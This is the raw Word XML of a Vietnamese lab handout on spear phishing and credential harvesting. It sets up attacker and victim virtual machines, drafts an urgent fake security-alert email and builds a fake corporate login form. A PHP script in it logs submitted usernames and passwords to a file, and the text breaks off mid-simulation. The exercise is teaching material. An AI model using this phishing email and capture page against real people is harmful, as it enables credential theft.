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8634" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="241"/>
        <w:ind w:left="1474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LAB 2: SOCIAL ENGINEERING </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A91695C" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:right="116"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SPEAR PHISHING + CREDENTIAL HARVESTING</w:t>
      </w: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2783BA8D" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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987BAF" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="11"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 1. Mục tiêu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCD8E7E" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:right="1410" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hiểu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>quy trình Social Engineering hoàn chỉnh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Thực hành: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OSINT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E027CD" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="253" w:lineRule="auto"/>
        <w:ind w:left="1090" w:right="4723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Phishing email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Fake login page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Credential harvesting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D63CDE0" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="263" w:line="251" w:lineRule="auto"/>
        <w:ind w:right="1410" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Viết </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>báo cáo pentest chuyên nghiệp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DDBB28" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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61AA87" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="119"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 2. Mô hình lab </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D7AAF9" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="132"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Máy Attacker (Kali Linux) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC6F98F" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Vai trò: tạo website giả, gửi phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E60BA64" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="387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IP ví dụ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>192.168.56.101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DB6731" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="132"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Máy Victim (Windows 10 / Ubuntu / RHEL ) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12ACF9" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Vai trò: nạn nhân </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A82B522" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="27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IP ví dụ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>192.168.56.102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6BA9AD" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="268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Cả 2 máy: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745920E5" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="486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Cùng mạng NAT / Host-only (VMware/VirtualBox) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4FE33C" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Công cụ sử dụng </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5473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2453"/>
      </w:tblGrid>
      <w:tr w:rsidR="00513389" w14:paraId="6DC87807" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="273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05CD39F6" w14:textId="77777777" w:rsidR="00513389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Công cụ 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2D353895" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="168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Máy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Mục đích </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00513389" w14:paraId="49B753BB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="336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3EB1A4D2" w14:textId="77777777" w:rsidR="00513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Terminal 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400CE4EE" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1189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Kali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chạy lệnh </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00513389" w14:paraId="1E0600BD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="336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1913FB89" w14:textId="77777777" w:rsidR="00513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Apache2 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2EA57F00" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="133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Kali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host web giả </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00513389" w14:paraId="3E886E58" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="336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67570F0D" w14:textId="77777777" w:rsidR="00513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nano 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11E94F00" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="106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Kali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tạo file </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00513389" w14:paraId="27C17146" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="277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14:paraId="12FDFA6A" w14:textId="77777777" w:rsidR="00513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Browser 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347C832F" w14:textId="77777777" w:rsidR="0051338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Victim truy cập phishing </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4323640B" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2552"/>
          <w:tab w:val="center" w:pos="3901"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="251" w:lineRule="auto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Công cụ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Máy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Mục đích </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC1DD20" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="3901"/>
        </w:tabs>
        <w:spacing w:after="33" w:line="253" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Social-Engineer Toolkit (SET) Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(tuỳ chọn nâng cao) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4CFA62" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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2E2857" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 4. Giai đoạn chuẩn bị </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE67EC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1: (Attacker – Kali) Kiểm tra IP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5575AC2A" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="327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ip a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5AA286" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="0000000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Ghi lại IP: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619AB4D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192.168.56.101 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD5A6C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2DCF0" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="30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2: (Attacker – Kali) Cài web server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B2DF31" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4360" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update sudo apt install apache2 -y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D294C51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sudo systemctl start apache2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461A061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2AB16" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="87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3: (Attacker – Kali) Test web </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A62F3" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="65" w:line="530" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="3202" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mở trình duyệt trên Kali: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1832FD11" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="491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Nếu thấy “Apache Default Page” → OK </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77232128" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 5. Giai đoạn OSINT (Mô phỏng) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BBED46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4: (Attacker – Kali) Tạo hồ sơ mục tiêu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A6614" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="489" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4360" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nano target_profile.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nội dung: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7AEA54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Name: Nguyen Van A </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C62EB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Position: IT Support </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EBB95F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Company: ABC Corp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B334FDA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Email: nguyenvana@abc.local </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8B059B" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="47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Behavior: thường xử lý tài khoản người dùng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5262F9FA" w14:textId="77777777" w:rsidR="0051338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1CD086" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="87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Bước 5: Phân tích điểm yếu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E788350" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26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Kết luận: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70527DB5" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Tin email nội bộ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD8D74" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Có quyền truy cập hệ thống </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481868FE" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="268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Dễ bị lừa bởi cảnh báo bảo mật </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B80A78C" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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A88671" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 6. Thiết kế kịch bản tấn công </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793A7C22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6: (Attacker – Kali) Viết scenario </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B91172" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4201" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nano scenario.txt - Giả danh IT Security </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDF2E3C" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="249" w:lineRule="auto"/>
        <w:ind w:right="1860" w:hanging="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Gửi email cảnh báo login bất thường </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD9C3E" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="50" w:line="249" w:lineRule="auto"/>
        <w:ind w:right="1860" w:hanging="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu reset mật khẩu - Dẫn đến website giả </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5FFED2" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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BF815B" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 7. Tạo Email Phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD222F9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7: (Attacker – Kali) Soạn email </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47949D06" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3001" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nano phishing_email.txt Subject: [URGENT] Security Alert </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58BEAE" w14:textId="77777777" w:rsidR="00513389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97E857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Dear Nguyen Van A, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB8FDE4" w14:textId="77777777" w:rsidR="00513389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FF0D4B8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We detected suspicious login activity from your account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D55DC" w14:textId="77777777" w:rsidR="00513389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173A98C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Please verify immediately: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3C246C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http://192.168.56.101/phishing/login.html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274DFE6E" w14:textId="77777777" w:rsidR="00513389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6268877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Failure to do so will result in account lock. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4E3A83" w14:textId="77777777" w:rsidR="00513389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727820A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IT Security Team </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B49A4B" w14:textId="77777777" w:rsidR="00513389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88FEEDD" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="54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4CB4FEF" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 8. Tạo Fake Website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C63E68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8: (Attacker – Kali) Tạo thư mục </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E550E63" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4784" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/html sudo mkdir phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7015ABA7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cd phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A670EA5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A995DA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9: (Attacker – Kali) Tạo login page </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE691BB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sudo nano login.html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A717BFD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&lt;h2&gt;ABC Corp Secure Login&lt;/h2&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE7692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&lt;form action="capture.php" method="post"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76079AD3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Username: &lt;input name="user"&gt;&lt;br&gt;&lt;br&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB7E0D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Password: &lt;input type="password" name="pass"&gt;&lt;br&gt;&lt;br&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF73B1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 type="submit"&gt;Login&lt;/button&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F62543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&lt;/form&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0084FB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FA84F3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10: (Attacker – Kali) Tạo file capture </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB2A1C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sudo nano capture.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B20C1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&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C468DF" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="2503" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">file_put_contents("log.txt", date("Y-m-d H:i:s")." | ". $_POST['user']." | ". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F82E45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$_POST['pass']."\n", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13DF43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FILE_APPEND); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0168F126" w14:textId="77777777" w:rsidR="00513389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1F7F02F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header("Location: https://google.com"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC60974" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="49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?&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6565F8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05AD7A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11: (Attacker – Kali) Tạo log file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DD0354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sudo touch log.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D57777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sudo chmod 777 log.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D551B27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FF51A8" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="31"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="0074BA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 xml:space="preserve"> Bước 12: (Attacker – Kali) Restart Apache </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EC4D22" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="49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sudo systemctl restart apache2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0157E68D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4507E" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="85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Bước 13: (Victim) Truy cập thử </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600BE21" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="0000000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Mở browser trên Victim: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658ABA7C" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="329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http://192.168.56.101/phishing/login.html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16211BFA" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000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Nếu thấy form login → OK </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3AF76D" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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32CD83" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="4"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 9. Thực hiện tấn công (Simulation) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C030E48" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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47A503" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="89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14: (Victim) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13926186" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:right="706" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy nội dung email </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B407DA" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="263" w:line="253" w:lineRule="auto"/>
        <w:ind w:right="706" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dán link vào browser </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E1C8D" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
